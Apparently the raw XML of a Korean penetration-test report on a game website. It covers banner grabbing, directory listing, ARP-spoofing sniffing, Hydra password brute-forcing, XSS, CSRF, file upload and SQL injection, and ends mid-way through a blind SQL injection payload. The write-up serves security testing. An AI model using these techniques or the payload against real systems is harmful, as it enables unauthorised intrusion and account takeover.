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2A" w:rsidRDefault="009977E0" w:rsidP="009977E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UT, DELETE </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>메소드 확인</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FB241C" w:rsidRDefault="0063141B" w:rsidP="00FB241C">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="4492397" cy="207896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65" cy="20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1B" w:rsidRDefault="0063141B" w:rsidP="00FB241C"/>
    <w:p w:rsidR="0063141B" w:rsidRDefault="00292BD1" w:rsidP="00BD0E6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anner Grabbing</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008F59BE" w:rsidRDefault="000B03CD" w:rsidP="008F59BE">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="4200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-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CD" w:rsidRDefault="000B03CD" w:rsidP="000B03C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소울워커 메인 페이지 접속 후 </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Response </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">패킷을 확인하면 헤더를 통해 </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">HTTP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>버전</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, Apache </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>버전,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> OS </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>종류,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> PHP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>버전 정보를 확인할 수 있다.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FB186A" w:rsidRDefault="00FB186A" w:rsidP="00FB186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48377" cy="956972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93" cy="9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6A" w:rsidRDefault="00FB186A" w:rsidP="00FB186A">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5731510" cy="2806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-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6A" w:rsidRDefault="00FB186A" w:rsidP="00FB186A">
      <w:pPr>
        <w:pStyle w:val="a5"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:ind w:leftChars="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Httprint </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">툴을 이용해서 서버 정보를 알아보면 현재 메인 페이지로 도메인 접속 시 </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">https </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">접속으로 </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">redirect </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">되고 서버와 </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">OS </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>정보가 노출되어 있다.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BB6C09" w:rsidRDefault="00BB6C09" w:rsidP="00BB6C09">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="4848225" cy="1800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-0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09" w:rsidRDefault="00B820E4" w:rsidP="00BB6C09">
      <w:pPr>
        <w:pStyle w:val="a5"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:ind w:leftChars="0"/>
      </w:pPr>
      <w:hyperlink r:id="rId12" w:history="1">
        <w:r w:rsidR="00BB6C09" w:rsidRPr="00CF7024">
          <w:rPr>
            <w:rStyle w:val="a6"/>
            <w:rFonts w:hint="eastAsia"/>
          </w:rPr>
          <w:t>w</w:t>
        </w:r>
        <w:r w:rsidR="00BB6C09" w:rsidRPr="00CF7024">
          <w:rPr>
            <w:rStyle w:val="a6"/>
          </w:rPr>
          <w:t>ww.soulworker.com</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00BB6C09">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00BB6C09">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">접속 시 기본 페이지인 </w:t>
      </w:r>
      <w:r w:rsidR="00BB6C09">
        <w:t>/home/Main/main.php</w:t>
      </w:r>
      <w:r w:rsidR="00BB6C09">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>에서 M</w:t>
      </w:r>
      <w:r w:rsidR="00BB6C09">
        <w:t xml:space="preserve">ain </w:t>
      </w:r>
      <w:r w:rsidR="00BB6C09">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>디렉토리에 없을 법한 파일을 요청한 후</w:t>
      </w:r>
      <w:r w:rsidR="00BB6C09">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00BB6C09">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">오류 메시지를 확인해보면 여기에서도 서버와 </w:t>
      </w:r>
      <w:r w:rsidR="00BB6C09">
        <w:t xml:space="preserve">OS </w:t>
      </w:r>
      <w:r w:rsidR="00BB6C09">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>버전 정보를 확인할 수 있다.</w:t>
      </w:r>
      <w:r w:rsidR="00BB6C09">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C6587" w:rsidRDefault="002C6587" w:rsidP="002C6587"/>
    <w:p w:rsidR="002C6587" w:rsidRDefault="002C6587" w:rsidP="002C6587"/>
    <w:p w:rsidR="002C6587" w:rsidRDefault="002C6587" w:rsidP="002C6587"/>
    <w:p w:rsidR="008F59BE" w:rsidRDefault="00292BD1" w:rsidP="008F59BE">
      <w:pPr>
        <w:pStyle w:val="a5"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:leftChars="0"/>
      </w:pPr>
      <w:r>
        <w:t>Directory listing</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008F59BE" w:rsidRDefault="008F59BE" w:rsidP="008F59BE">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="1604513" cy="20263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0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63" cy="20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587">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="1781551" cy="200995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0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030" cy="20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587">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="1716656" cy="2014757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0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358" cy="20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BE" w:rsidRDefault="008F59BE" w:rsidP="008F59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현재 메인 페이지가 위치한 </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Main </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">디렉토리 상위 디렉토리인 </w:t>
      </w:r>
      <w:r>
        <w:t>home</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>으로 접속을 해보면 D</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">irectory Listing </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>이 실행되는 것을 확인</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00695435" w:rsidRDefault="00695435" w:rsidP="008F59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기타 다른</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>디렉터리 구조를</w:t>
      </w:r>
      <w:r w:rsidR="002C6587">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="002C6587">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>파악할 수 있다.</w:t>
      </w:r>
      <w:r w:rsidR="002C6587">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00992E34" w:rsidRDefault="00992E34" w:rsidP="00992E34"/>
    <w:p w:rsidR="00992E34" w:rsidRDefault="00992E34" w:rsidP="00992E3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niffing</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>을 통한 S</w:t>
      </w:r>
      <w:r>
        <w:t>ession Hijacking</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007B079D" w:rsidRDefault="007B079D" w:rsidP="007B079D">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5731510" cy="9144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0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0483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-0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CD" w:rsidRDefault="007B079D" w:rsidP="007B07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RP Spoofing</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">을 이용한 </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">MITM </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>공격으로 스니핑에 성공 후 패킷을 확인할 수 있었지만,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> SSL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>을 이용한 암호화 통신을 하고 있었기 때문에 패킷의 내용에 포함되어 있을 세션 정보를 알아내지 못함</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00977331" w:rsidRDefault="00977331" w:rsidP="007B07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RP Spoofing</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> 관련 내용은</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>이후에 다시 확인</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008F59BE" w:rsidRDefault="008F59BE" w:rsidP="008F59BE"/>
    <w:p w:rsidR="00292BD1" w:rsidRDefault="00001604" w:rsidP="000808B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D/PW Brute Forcing</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292BD1" w:rsidRDefault="000808BE" w:rsidP="00292BD1">
      <w:pPr>
        <w:ind w:left="400"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="2603821" cy="1587261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-0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485" cy="15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48309" cy="161438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0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47" cy="16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FF" w:rsidRDefault="00612BFF" w:rsidP="00292BD1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45192" cy="11966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-0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830" cy="3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193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-0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BE" w:rsidRDefault="000808BE" w:rsidP="000808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우선 모의해킹에 필요한</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">정상 로그인 정보를 확인하기 위해서 정상적인 방법으로 </w:t>
      </w:r>
      <w:r>
        <w:t>ID</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">가 </w:t>
      </w:r>
      <w:r>
        <w:t>hacker</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">이고 비밀번호가 </w:t>
      </w:r>
      <w:r>
        <w:t>hacker</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>인 계정을 생성</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000808BE" w:rsidRDefault="000808BE" w:rsidP="000808BE">
      <w:pPr>
        <w:pStyle w:val="a5"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:ind w:leftChars="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Paros </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>툴을 통해서 프록시 서버를</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>설정한 상태로</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>정상 로그인 시와 로그인 실패 시 응답 패킷 내용을 확인</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006245DB" w:rsidRDefault="0054335D" w:rsidP="005433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로그인 실패 시에만 나타나는 문자열을 확인해서 </w:t>
      </w:r>
      <w:r>
        <w:t>Hydr</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>a를 이용한 공격에 사용</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006245DB" w:rsidRDefault="006245DB">
      <w:pPr>
        <w:widowControl/>
        <w:wordWrap/>
        <w:autoSpaceDE/>
        <w:autoSpaceDN/>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="006245DB" w:rsidRDefault="006245DB" w:rsidP="006245DB">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5731510" cy="2673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-0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3652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-0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27275" cy="148742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-0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10" cy="1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FF" w:rsidRDefault="006245DB" w:rsidP="00612BFF">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="3683479" cy="93659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-0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02" cy="9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DB" w:rsidRDefault="006245DB" w:rsidP="00612BFF">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="410B9429" wp14:editId="743FC308">
            <wp:extent cx="3000375" cy="3905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-03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DB" w:rsidRDefault="00071148" w:rsidP="00612BFF">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0AD19F7B" wp14:editId="26DFE6BC">
            <wp:extent cx="790575" cy="4381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-0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5DB">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="1190625" cy="39624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-0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8C" w:rsidRDefault="006245DB" w:rsidP="006245DB">
      <w:pPr>
        <w:pStyle w:val="a5"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:ind w:leftChars="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Hydra </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">툴을 사용해서 </w:t>
      </w:r>
      <w:r>
        <w:t>hac</w:t>
      </w:r>
      <w:r w:rsidR="00B97C4B">
        <w:t xml:space="preserve">ker </w:t>
      </w:r>
      <w:r w:rsidR="00B97C4B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">계정과 </w:t>
      </w:r>
      <w:r w:rsidR="00B97C4B">
        <w:t xml:space="preserve">user1 </w:t>
      </w:r>
      <w:r w:rsidR="00B97C4B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">계정에 대한 </w:t>
      </w:r>
      <w:r w:rsidR="00B97C4B">
        <w:t xml:space="preserve">Brute Forcing </w:t>
      </w:r>
      <w:r w:rsidR="00B97C4B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">공격을 실시 </w:t>
      </w:r>
      <w:r w:rsidR="00B97C4B">
        <w:t>DB</w:t>
      </w:r>
      <w:r w:rsidR="00B97C4B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">에 저장된 비밀번호와 일치하는 </w:t>
      </w:r>
      <w:r w:rsidR="00B97C4B">
        <w:t>Password</w:t>
      </w:r>
      <w:r w:rsidR="00B97C4B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>를 찾아내는 것을 확인</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C378C" w:rsidRDefault="008C378C">
      <w:pPr>
        <w:widowControl/>
        <w:wordWrap/>
        <w:autoSpaceDE/>
        <w:autoSpaceDN/>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="006245DB" w:rsidRDefault="00EF4A4F" w:rsidP="00EF4A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X</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">SS </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>공격</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EF4A4F" w:rsidRDefault="000C2CA0" w:rsidP="00EF4A4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3382" cy="433857"/>
            <wp:effectExtent l="0" t="0" r="3175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-05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31" cy="4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25087" cy="135808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-05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375" cy="13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4F" w:rsidRDefault="000C2CA0" w:rsidP="00EF4A4F">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5731510" cy="280670"/>
            <wp:effectExtent l="0" t="0" r="254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-05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A0" w:rsidRDefault="000C2CA0" w:rsidP="00EF4A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14871A" wp14:editId="158FAB44">
            <wp:extent cx="2205357" cy="122830"/>
            <wp:effectExtent l="0" t="0" r="444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-05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50" cy="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A0" w:rsidRDefault="000C2CA0" w:rsidP="00EF4A4F">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="3978322" cy="642632"/>
            <wp:effectExtent l="0" t="0" r="317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-05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864" cy="6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0" w:rsidRDefault="00893330" w:rsidP="00EF4A4F">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="3058706" cy="798394"/>
            <wp:effectExtent l="0" t="0" r="8890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-060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40" cy="8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B84CD8" wp14:editId="0568C0AE">
            <wp:extent cx="2518012" cy="831619"/>
            <wp:effectExtent l="0" t="0" r="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-058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96" cy="8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0" w:rsidRDefault="00893330" w:rsidP="00EF4A4F">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="1815869" cy="109182"/>
            <wp:effectExtent l="0" t="0" r="0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-06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783" cy="1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67485F" wp14:editId="665011C4">
            <wp:extent cx="3241344" cy="10378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-06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19" cy="1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57" w:rsidRDefault="00437157" w:rsidP="00EF4A4F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00437157" w:rsidRDefault="00437157" w:rsidP="004371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SRF</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EA0B87" w:rsidRDefault="00EA0B87" w:rsidP="00EA0B8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 정보 수정</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B1169F" w:rsidRDefault="00B1169F" w:rsidP="00B1169F">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="2114550" cy="2159062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-067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051" cy="21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62300" cy="605762"/>
            <wp:effectExtent l="0" t="0" r="0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-068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6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9F" w:rsidRDefault="00B1169F" w:rsidP="00B116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19475" cy="9810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-06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87" w:rsidRDefault="00EA0B87" w:rsidP="00EA0B8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광고글 게시</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006B18DD" w:rsidRDefault="006B18DD" w:rsidP="006B18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13093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-07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DD" w:rsidRDefault="006B18DD" w:rsidP="00EA0B87">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="2686050" cy="945147"/>
            <wp:effectExtent l="0" t="0" r="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-070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60" cy="9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86050" cy="3275671"/>
            <wp:effectExtent l="0" t="0" r="0" b="12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-07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41" cy="32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DD" w:rsidRDefault="00173FE7" w:rsidP="00EA0B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2825" cy="153000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-073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808" cy="15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886200" cy="1800586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-07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85" cy="1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72000" cy="897583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-07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11" cy="9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05325" cy="922429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-07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78" cy="9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57" w:rsidRDefault="00437157" w:rsidP="004371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 업로드 취약점</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EA0B87" w:rsidRDefault="00B1169F" w:rsidP="00EA0B87">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="2419350" cy="206312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-066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40" cy="20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87">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="1753637" cy="199072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-063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574" cy="19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87">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="2372647" cy="1543050"/>
            <wp:effectExtent l="0" t="0" r="889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-06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803" cy="15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87">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="3000375" cy="52279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-06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176" cy="52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E7" w:rsidRDefault="00173FE7">
      <w:pPr>
        <w:widowControl/>
        <w:wordWrap/>
        <w:autoSpaceDE/>
        <w:autoSpaceDN/>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B1169F" w:rsidRDefault="00173FE7" w:rsidP="00173F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 w:rsidR="006436C5">
        <w:t>QL Injection</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006436C5" w:rsidRDefault="006436C5" w:rsidP="006436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인증 우회 공격</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B83A5F" w:rsidRDefault="00B83A5F" w:rsidP="00B83A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33458" cy="1365159"/>
            <wp:effectExtent l="0" t="0" r="635" b="698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K-077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10" cy="13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67000" cy="795207"/>
            <wp:effectExtent l="0" t="0" r="0" b="508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-08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64" cy="8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28925" cy="62966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-07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25" cy="6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71775" cy="826446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-07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68" cy="8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EF" w:rsidRDefault="00F247EF" w:rsidP="006436C5">
      <w:pPr>
        <w:pStyle w:val="a5"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:ind w:leftChars="0"/>
      </w:pPr>
      <w:r>
        <w:t>Blind injection</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B83A5F" w:rsidRDefault="00B83A5F" w:rsidP="00B83A5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6475" cy="1448054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-081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31" cy="14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43150" cy="1490465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-082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21" cy="14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24C8BA" wp14:editId="543545C3">
            <wp:extent cx="2009149" cy="599058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-08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03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11703A" wp14:editId="450B428D">
            <wp:extent cx="2009775" cy="599244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-07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503" cy="6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8" w:rsidRDefault="00B83A5F" w:rsidP="00B83A5F">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="2894702" cy="95250"/>
            <wp:effectExtent l="0" t="0" r="127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K-08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491" cy="1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768184" wp14:editId="76539EA2">
            <wp:extent cx="2428606" cy="9525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-085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75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5075" cy="694405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-084.png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50" cy="7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04618" cy="646309"/>
            <wp:effectExtent l="0" t="0" r="635" b="190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-086.pn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355" cy="6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AE" w:rsidRDefault="001852F8" w:rsidP="00B83A5F">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>D</w:t>
      </w:r>
      <w:r>
        <w:t>B</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>이름</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E108AE" w:rsidRDefault="001852F8" w:rsidP="00B83A5F">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5731510" cy="147955"/>
            <wp:effectExtent l="0" t="0" r="2540" b="444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K-089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47955"/>
            <wp:effectExtent l="0" t="0" r="2540" b="444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K-090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05475" cy="17636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K-087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58" cy="1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1465580"/>
            <wp:effectExtent l="0" t="0" r="2540" b="127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K-088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8" w:rsidRDefault="001852F8" w:rsidP="00B83A5F">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5731510" cy="125095"/>
            <wp:effectExtent l="0" t="0" r="2540" b="825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K-09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25095"/>
            <wp:effectExtent l="0" t="0" r="2540" b="825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K-092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25095"/>
            <wp:effectExtent l="0" t="0" r="2540" b="825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K-093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25095"/>
            <wp:effectExtent l="0" t="0" r="2540" b="825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K-094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25095"/>
            <wp:effectExtent l="0" t="0" r="2540" b="825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K-095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8" w:rsidRDefault="001852F8" w:rsidP="00B83A5F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>버전 정보</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001852F8" w:rsidRDefault="001852F8" w:rsidP="00B83A5F">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5731510" cy="146050"/>
            <wp:effectExtent l="0" t="0" r="2540" b="635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K-096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8" w:rsidRDefault="00D64ADA" w:rsidP="00B83A5F">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>테이블</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001852F8" w:rsidRDefault="001852F8" w:rsidP="001852F8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>and length((select table_name from (select table_name from information_schema.ta</w:t>
      </w:r>
